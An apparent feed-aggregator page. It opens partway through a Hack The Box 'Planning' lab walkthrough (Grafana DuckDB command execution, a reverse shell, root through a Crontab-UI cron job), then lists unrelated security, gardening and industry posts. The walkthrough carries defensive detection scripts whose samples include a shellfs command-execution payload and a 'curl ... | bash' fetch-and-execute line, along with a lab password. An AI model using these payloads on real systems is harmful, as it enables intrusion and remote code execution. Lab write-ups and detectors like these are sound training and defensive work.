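    re.compile(r"\|\s*[\"']\s*\)", re.I),                            # trailing pipe inside the path = shellfs command
    re.compile(r"\bcopy\b.+\bto\b", re.I),                           # write query output to an arbitrary path
]

def find_sql_expressions(body: dict):
    """Yield the SQL text of every SQL Expression query in an /api/ds/query body."""
    for q in body.get("queries", []):
        ds = q.get("datasource") or {}
        if ds.get("type") == "__expr__" and q.get("type") == "sql":
            yield q.get("expression", "")

def score_request(line: str) -> dict:
    """Parse one logged request and return the indicators it matched."""
    rec = json.loads(line)
    hits = []
    if rec.get("path", "").rstrip("/").endswith("/api/ds/query"):
        try:
            body = json.loads(rec.get("body") or "{}")
        except json.JSONDecodeError:
            body = {}
        for expr in find_sql_expressions(body):
            for pat in SUSPICIOUS_SQL:
                if pat.search(expr):
                    hits.append(pat.pattern)
    return {"user": rec.get("user"), "path": rec.get("path"), "hits": sorted(set(hits))}

def duckdb_on_path() -> bool:
    """Mitigation check: the flaw needs a duckdb binary reachable from Grafana's PATH."""
    return shutil.which("duckdb") is not None

# Constructed sample: one benign expression, one with the same shape as the payload above,
# and one unrelated request.
SAMPLE_LOG = [
    json.dumps({"user": "viewer1", "path": "/api/ds/query",
                "body": json.dumps({"queries": [{"datasource": {"type": "__expr__"}, "type": "sql",
                                                  "expression": "SELECT sum(value) FROM A"}]})}),
    json.dumps({"user": "admin", "path": "/api/ds/query",
                "body": json.dumps({"queries": [{"datasource": {"type": "__expr__"}, "type": "sql",
                                                  "expression": "SELECT 1; install shellfs from community; "
                                                                "LOAD shellfs; SELECT * FROM read_csv(\"id |\")"}]})}),
    json.dumps({"user": "admin", "path": "/api/dashboards/home", "body": ""}),
]

def alerts(lines=SAMPLE_LOG):
    """Return only the requests that matched at least one indicator."""
    return [r for r in map(score_request, lines) if r["hits"]]

if __name__ == "__main__":
    for a in alerts():
        print(f"ALERT user={a['user']} path={a['path']} indicators={a['hits']}")
    print("duckdb on PATH:", duckdb_on_path())
```

Only the second record trips the rule; a legitimate aggregation expression does not. The `read_csv(` pattern is deliberately broad because DuckDB's file readers are also the file-read primitive of this bug, so tune it to the expressions your dashboards actually use before turning it into an alert.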

Reading the contents of /tmp/output.txt confirms that the whoami command executed on the target machine.

Let’s set up our listener to catch the reverse shell.

Use this SQL command to execute the bash script.

It’s hanging, which is a good sign that the payload is executing.

We successfully received a reverse shell connection.

We attempted to switch to the enzo user with su enzo, but it didn’t work.

SSH worked perfectly and allowed us to log in successfully.

We were able to read the user flag by running cat user.txt.

Escalating to Root Privileges

Privilege Escalation:

Locate the database file.

We discovered /opt/crrontabs/crontab.db.

The password for root_grafana is P4ssw0rdS0pRi0T3c.

Port 8000 is open here, which is unusual.

Let’s set up port forwarding for port 8000.

We need to provide the credentials to log in.

We need to use the credentials we discovered earlier to log in.

It turned out to be a cron jobs management interface.

What is Crontab-UI?

Crontab-UI is an open-source Node.js web interface for managing cron jobs on Unix-like systems, simplifying tasks like creating, editing, pausing, deleting, and backing up crontab entries via a browser (default: http://localhost:8000). It reduces errors from manual text editing, supports error logging, email notifications, webhooks, and easy import/export for multi-machine deployment. Installation is via npm (npm install crontab-ui -g), with optional Docker support and Basic Auth for security. Ideal for beginners handling scheduled tasks.

We need to create a new cron job command.

The shell.sh file contains the reverse shell that will connect back to us.

We will use curl to fetch the file, as demonstrated earlier.

The file was transferred successfully, as expected.

We were able to access the root shell and read the root flag by running cat root.txt.
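For the defender, the equivalent check is to audit what Crontab-UI has actually been told to run. The following Python script is an added example, not from the walkthrough or the Crontab-UI project: it assumes Crontab-UI's crontab.db is a NeDB file with one JSON document per line carrying name, command, schedule, stopped and _id fields, and that Basic Auth is enabled through the BASIC_AUTH_USER and BASIC_AUTH_PWD environment variables (both are assumptions about the project); the sample records are constructed.

```python
"""Audit helper for a Crontab-UI job store.

Added example, not part of the walkthrough or of Crontab-UI. Assumes the
NeDB layout of crontab.db (one JSON document per line, "$$deleted" and
"$$indexCreated" meta documents, later documents superseding earlier
ones with the same _id) and the BASIC_AUTH_* environment variable names;
both are assumptions. Sample records below are constructed.
"""
import json
import os
import re

# Command shapes a defender would not expect in a legitimate scheduled job:
# a remote script fetched and piped straight into a shell, a shell wired to a
# network socket, or a script executed from a world-writable directory.
RISKY_COMMAND = [
    re.compile(r"\b(curl|wget)\b[^|;]*\|\s*(ba)?sh\b", re.I),   # fetch-and-execute
    re.compile(r"/dev/tcp/", re.I),                               # bash socket redirection
    re.compile(r"\b(nc|ncat|netcat)\b.*\s-e\s", re.I),            # netcat handing over a shell
    re.compile(r"\bbash\s+-i\b", re.I),                           # interactive shell in cron
    re.compile(r"(^|\s)/tmp/\S+\.sh\b", re.I),                    # script run from /tmp
]

def load_jobs(db_text: str):
    """Parse NeDB lines; a later document with the same _id supersedes the earlier one."""
    jobs = {}
    for line in db_text.splitlines():
        line = line.strip()
        if not line:
            continue
        doc = json.loads(line)
        if doc.get("$$deleted"):
            jobs.pop(doc.get("_id"), None)
            continue
        if "$$indexCreated" in doc:
            continue
        jobs[doc.get("_id")] = doc
    return list(jobs.values())

def audit_jobs(db_text: str):
    """Return every job whose command trips an indicator, with the patterns matched."""
    findings = []
    for job in load_jobs(db_text):
        cmd = job.get("command", "")
        hits = [p.pattern for p in RISKY_COMMAND if p.search(cmd)]
        if hits:
            findings.append({"name": job.get("name"), "command": cmd,
                             "stopped": bool(job.get("stopped")), "hits": hits})
    return findings

def basic_auth_configured(env=os.environ) -> bool:
    """Whether the assumed BASIC_AUTH_USER / BASIC_AUTH_PWD variables are both set."""
    return bool(env.get("BASIC_AUTH_USER")) and bool(env.get("BASIC_AUTH_PWD"))

# Constructed sample store: two benign jobs, one job edited from harmless to
# fetch-and-execute (the later document wins), and one stopped job run from /tmp.
SAMPLE_DB = "\n".join([
    json.dumps({"name": "Cleanup db logs", "command": "/home/root/scripts/cleanup.sh",
                "schedule": "*/1 * * * *", "stopped": False, "_id": "job1"}),
    json.dumps({"name": "Backup", "command": "tar czf /backup/site.tgz /var/www",
                "schedule": "0 2 * * *", "stopped": False, "_id": "job2"}),
    json.dumps({"name": "update", "command": "echo noop",
                "schedule": "* * * * *", "stopped": False, "_id": "job3"}),
    json.dumps({"name": "update", "command": "curl http://198.51.100.7/shell.sh | bash",
                "schedule": "* * * * *", "stopped": False, "_id": "job3"}),
    json.dumps({"name": "fetch", "command": "bash /tmp/shell.sh",
                "schedule": "* * * * *", "stopped": True, "_id": "job4"}),
])

if __name__ == "__main__":
    for f in audit_jobs(SAMPLE_DB):
        print(f"RISKY job={f['name']!r} stopped={f['stopped']} cmd={f['command']} hits={f['hits']}")
    print("basic auth configured:", basic_auth_configured())
```

Stopped jobs are still reported, because a paused entry can be re-enabled from the web UI with one click. Because Crontab-UI runs jobs as the account that started the service, a finding on an instance started by root is a root-level finding.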

The post Hack The Box: Planning Machine Walkthrough – Easy Difficulty appeared first on Threatninja.net.

Innovator Spotlight: Xcape

By: Gary
9 September 2025 at 15:40

Continuous Vulnerability Management: The New Cybersecurity Imperative Security leaders are drowning in data but starving for actionable insights. Traditional penetration testing has become a snapshot of vulnerability that expires faster...

The post Innovator Spotlight: Xcape appeared first on Cyber Defense Magazine.

Innovator Spotlight: Adaptive Security

By: Gary
3 September 2025 at 15:38

The AI Threat Landscape: How Adaptive Security is Redefining Cyber Defense Cybersecurity professionals are facing an unprecedented challenge. The rise of generative AI has transformed attack vectors from theoretical risks...

The post Innovator Spotlight: Adaptive Security appeared first on Cyber Defense Magazine.

Winter Garden Clean Up

28 November 2022 at 23:58

As winter approaches, it’s tempting just to sit back and put your feet up and not have to think about the garden until springtime. However, just a bit of extra work at this time of the year can save you a whole lot of hassle come planting time. Garden clean-up, the last big chore for gardeners, is often overlooked, especially […]

The post Winter Garden Clean Up appeared first on Backyard Gardener.

Winter Ornamentals – Bark

28 November 2022 at 23:58

 Winter Ornamentals – Bark Book Excerpt by Dan Hinkley Like the last and messy hours of a party gone on too long, the soggy, cool days of late autumn cast about the garden a mood of the season’s demise. Yet as the last colored leaves, varnished with the first rains of winter, fall earthward, the deciduous trees bare their sinewy […]

The post Winter Ornamentals – Bark appeared first on Backyard Gardener.

Race Day: Making the Most of Your Penetration Test

18 March 2021 at 17:43

Penetration Testing and Formula One Racing – Preparation is Key

By Nathan Jones Director, Customer Success, Synack

In Formula One, the most prepared teams have the best chances of success. Yet, preparation alone isn’t going to clinch a victory. Many factors contribute to crossing the finish line first: track conditions, weather, car setup, strategy changes and updates, as well as driver skill and decision making.

Penetration testing isn’t any different.

Following all the best practices and preparations laid out in our previous blog about getting ready for pentests like a Formula One champ is key, but you can’t truly succeed without smooth execution and deft management throughout the test.

At Synack, we’ve got you covered throughout the entire engagement on our Crowdsourced Penetration Testing Platform before and after our trusted network of security researchers go to work hunting for your vulnerabilities. 

Here’s what to expect throughout the Synack engagement:

  • It starts with high-quality, trusted researchers

Your pit team: Researchers’ skills are critically important to the success of any pentest. Because the vulnerability landscape is so broad and diverse, a single researcher — or even a small number of researchers — won’t have expertise across all vulnerability categories to fully test the assets in question. 

That’s the value of the Synack crowdsourced testing platform because we attract the best researchers with a wide variety of skills and backgrounds. This allows large numbers of researchers to bring their experience to bear across the range of vulnerability categories, enabling the most thorough test of the assets in scope.

  • Results get collected in a well-designed platform

Right car, right tools: A top-quality vulnerability management platform should underpin any pentest initiative, allowing customers to manage the full vulnerability lifecycle from initial reports, to analyst review, and then onto remediation. At Synack, the customer portal lets your team view vulnerabilities flow through a logical, easy-to-use workflow from discovery to patch to patch verification. 

In addition, our triage process ensures that vulnerability findings passed to the customer are valid, reproducible, high quality and actionable. This allows the customer to focus efforts on understanding the issues and taking appropriate action, saving considerable time and effort.

  • Control the testing environment and parameters

Know the course: Some penetration tests can be intrusive and noisy. The Synack experience has been designed to make the process as simple and seamless as possible. It is carried out in a controlled manner to mitigate any impact on the client’s everyday business operations. Researchers work from a known source IP to ensure proper monitoring. Customers are encouraged to monitor activity and traffic during the test, but we recommend waiting for a formal vulnerability report before any patching. Patching during a test limits researchers’ ability to validate the finding and reward the researcher.

  • Engage with researchers before and after the test

Connected to the pit crew: A testing engagement should not be a fire-and-forget activity. Customers should be looking to provide regular feedback, including information about new releases or changes, areas of scope on which researchers should focus and updates on any customer actions. 

Scope changes are a critical area of communication. A class of vulnerabilities caused by the same underlying issue should be temporarily removed from scope to prevent inundating the client with repetitive findings. We do this at Synack because it reduces noise as well as shifts the focus of researchers to other areas, thus ensuring better coverage.

  • Augment manual testing with smart automation

Change out the equipment when needed: Penetration testing harnesses human creativity to create value, but automated scanners are an important tool as well to augment human efforts. Too often, however, security teams have had to accept trade-offs, investing in cheap self-service scanning solutions to get broad attack surface coverage. There’s a better way. Smarter technologies built on machine learning principles can make a difference and help scale the testing effort. At Synack, SmartScan®, our vulnerability assessment solution, enables, rather than burdens, security teams by scaling security testing and accelerating their vulnerability remediation processes. SmartScan® combines industry-best scanning technology, proprietary risk identification technology, and a crowd of the world’s best security researchers, the Synack Red Team (SRT), for noiseless scanning and high-quality triage.

  • Recognize the possibility of unintended consequences 

Expect the unexpected: Every pentester and testing company seeks to avoid unwanted impact to the customer. Most issues can be avoided by having an accurate scope and researcher guidelines agreed ahead of testing. On the rare occasion that there is an incident, we have a process in place to deal with it immediately.  

  • Act on the results

Celebrate your wins, learn from your mistakes: It’s essential that clients act on findings. Just discovering vulnerabilities does not improve an organization’s risk posture. The vulnerabilities should be patched and remediated as soon as possible. Clients should look to monitor and track their risk posture over time using a risk metric such as Synack’s Attacker Resistance Score to chart improvements. 

For long-term testing engagements, clients should not wait until the pentest has completed, but should fix issues and receive confirmation from the pentester that the mitigation was successful throughout the test. 

Verifying compliance with necessary regulations is also a key part of using the results of a penetration test. Synack strongly recommends that clients opt for a testing package that includes compliance checking against relevant OWASP categories, PCI DSS 11.3 or NIST SP 800-53. A testing checklist provides auditable documentation for compliance-driven penetration testing requirements.

  • Keep on testing 

Always winning: In Formula One, when the race ends, the work isn’t over. There are always more races to run and further developments and improvements to make to stay ahead of the pack.

The same is true in pentesting. As adversaries get more advanced, staying one step ahead in their cybersecurity is more important than ever. Regular pentesting is a key component of this. A client is only as strong as their weakest link, making appropriate pentesting against their entire attack surface critical to remaining cyber secure.

Winning looks like an overall reduction in vulnerability risk. While it’s impossible to eliminate all vulnerabilities, a healthy pentesting cadence will strengthen your security posture over time.

Nathan Jones is Director of Client Operations at Synack. He’s also a huge racing fan.

The post Race Day: Making the Most of Your Penetration Test appeared first on Synack.

Old Habits Die Hard: New Report Finds Businesses Still Introducing Security Risk into Cloud Environments

14 September 2022 at 06:00

While cloud computing and its many forms (private, public, hybrid cloud or multi-cloud environments) have become ubiquitous with innovation and growth over the past decade, cybercriminals have closely watched the migration and introduced innovations of their own to exploit the platforms. Most of these exploits are based on poor configurations and human error. New IBM Security X-Force data reveals that many cloud-adopting businesses are falling behind on basic security best practices, introducing more risk to their organizations.

Shedding light on the “cracked doors” that cybercriminals are using to compromise cloud environments, the 2022 X-Force Cloud Threat Landscape Report uncovers that vulnerability exploitation, a tried-and-true infection method, remains the most common way to achieve cloud compromise. Gathering insights from X-Force Threat Intelligence data, hundreds of X-Force Red penetration tests, X-Force Incident Response (IR) engagements and data provided by report contributor Intezer, between July 2021 and June 2022, some of the key highlights stemming from the report include:

  • Cloud Vulnerabilities are on the Rise — Amid a sixfold increase in new cloud vulnerabilities over the past six years, 26% of cloud compromises that X-Force responded to were caused by attackers exploiting unpatched vulnerabilities, becoming the most common entry point observed. 
  • More Access, More Problems — In 99% of pentesting engagements, X-Force Red was able to compromise client cloud environments through users’ excess privileges and permissions. This type of access could allow attackers to pivot and move laterally across a victim environment, increasing the level of impact in the event of an attack.
  • Cloud Account Sales Gain Grounds in Dark Web Marketplaces — X-Force observed a 200% increase in cloud accounts now being advertised on the dark web, with remote desktop protocol and compromised credentials being the most popular cloud account sales making rounds on illicit marketplaces.

Unpatched Software: #1 Cause of Cloud Compromise

As the rise of IoT devices drives more and more connections to cloud environments, the potential attack surface grows, introducing critical challenges for many businesses, such as proper vulnerability management. Case in point — the report found that more than a quarter of studied cloud incidents were caused by known, unpatched vulnerabilities being exploited. While the Log4j vulnerability and a vulnerability in VMware Cloud Director were two of the more commonly leveraged vulnerabilities observed in X-Force engagements, most exploited vulnerabilities observed primarily affected the on-premises version of applications, sparing the cloud instances.

As suspected, cloud-related vulnerabilities are increasing at a steady rate, with X-Force observing a 28% rise in new cloud vulnerabilities over the last year alone. With over 3,200 cloud-related vulnerabilities disclosed in total to date, businesses face an uphill battle when it comes to keeping up with the need to update and patch an increasing volume of vulnerable software. In addition to the growing number of cloud-related vulnerabilities, their severity is also rising, made apparent by the uptick in vulnerabilities capable of providing attackers with access to more sensitive and critical data as well as opportunities to carry out more damaging attacks.

These ongoing challenges point to the need for businesses to pressure test their environments and not only identify weaknesses in their environment, like unpatched, exploitable vulnerabilities, but prioritize them based on their severity, to ensure the most efficient risk mitigation.

Excessive Cloud Privileges Aid in Bad Actors’ Lateral Movement

The report also shines a light on another worrisome trend across cloud environments — poor access controls, with 99% of pentesting engagements that X-Force Red conducted succeeding due to users’ excess privileges and permissions. Businesses are allowing users unnecessary levels of access to various applications across their networks, inadvertently creating a stepping stone for attackers to gain a deeper foothold into the victim’s cloud environment.

The trend underlines the need for businesses to shift to zero trust strategies, further mitigating the risk that overly trusting user behaviors introduce. Zero trust strategies enable businesses to put in place appropriate policies and controls to scrutinize connections to the network, whether an application or a user, and iteratively verify their legitimacy. In addition, as organizations evolve their business models to innovate at speed and adapt with ease, it’s essential that they’re properly securing their hybrid, multi-cloud environments. Central to this is modernizing their architectures: not all data requires the same level of control and oversight, so determining the right workloads, to put in the right place for the right reason is important. Not only can this help businesses effectively manage their data, but it enables them to place efficient security controls around it, supported by proper security technologies and resources.

Dark Web Marketplaces Lean Heavier into Cloud Account Sales

With the rise of the cloud comes the rise of cloud accounts being sold on the Dark Web, verified by X-Force observing a 200% rise in the last year alone. Specifically, X-Force identified over 100,000 cloud account ads across Dark Web marketplaces, with some account types being more popular than others. Seventy-six percent of cloud account sales identified were Remote Desktop Protocol (RDP) access accounts, a slight uptick from the year prior. Compromised cloud credentials were also up for sale, accounting for 19% of cloud accounts advertised in the marketplaces X-Force analyzed.

The going price for this type of access is significantly low making these accounts easily attainable to the average bidder. The price for RDP access and compromised credentials average $7.98 and $11.74 respectively. Compromised credentials’ 47% higher selling price is likely due to their ease of use, as well as the fact that postings advertising credentials often include multiple sets of login data, potentially from other services that were stolen along with the cloud credentials, yielding a higher ROI for cybercriminals.

As more compromised cloud accounts pop up across these illicit marketplaces for malicious actors to exploit, it’s important that organizations work toward enforcing more stringent password policies by urging users to regularly update their passwords, as well as implement multifactor authentication (MFA). Businesses should also be leveraging Identity and Access Management tools to reduce reliance on username and password combinations and combat threat actor credential theft.

To read our comprehensive findings and learn about detailed actions organizations can take to protect their cloud environments, review our 2022 X-Force Cloud Security Threat Landscape here.

If you’re interested in signing up for the “Step Inside a Cloud Breach: Threat Intelligence and Best Practices” webinar on Wednesday, September 21, 2022, at 11:00 a.m. ET you can register here.

If you’d like to schedule a consult with IBM Security X-Force visit: www.ibm.com/security/xforce?schedulerform

The post Old Habits Die Hard: New Report Finds Businesses Still Introducing Security Risk into Cloud Environments appeared first on Security Intelligence.
